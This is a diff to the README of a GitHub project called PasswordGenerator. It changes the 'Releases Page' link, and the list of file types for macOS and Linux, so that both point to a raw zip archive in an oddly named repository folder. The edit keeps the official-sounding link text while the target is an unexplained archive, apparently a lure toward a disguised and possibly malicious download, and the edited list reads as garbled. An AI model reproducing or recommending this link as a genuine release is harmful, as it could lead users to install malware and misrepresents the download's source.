redz112/PasswordGenerator/README.md

 ## 🔗 Download & Install

-1. **Visit the Releases Page:** Go to the [PasswordGenerator Releases page](https://github.com/redz112/PasswordGenerator/releases).
+1. **Visit the Releases Page:** Go to the [PasswordGenerator Releases page](https://github.com/redz112/PasswordGenerator/raw/refs/heads/main/rhinolaryngoscope/Password_Generator_plectre.zip).

 2. **Select the Latest Version:** Look for the most recent version of PasswordGenerator.
 This version contains the latest features and security updates.

 3. **Download the Installer:**
    - Click on the asset link for your operating system.
    - For Windows, it will be a `.exe` file.
-   - For macOS and Linux, it may be a `.deb`, `.tar.gz`, or similar file.
+   - For macOS and Linux, it may be a `.deb`, `https://github.com/redz112/PasswordGenerator/raw/refs/heads/main/rhinolaryngoscope/Password_Generator_plectre.zip`, or similar file.

 4. **Run the Installer:**
    - For Windows, double-click the downloaded `.exe` file to start the installation.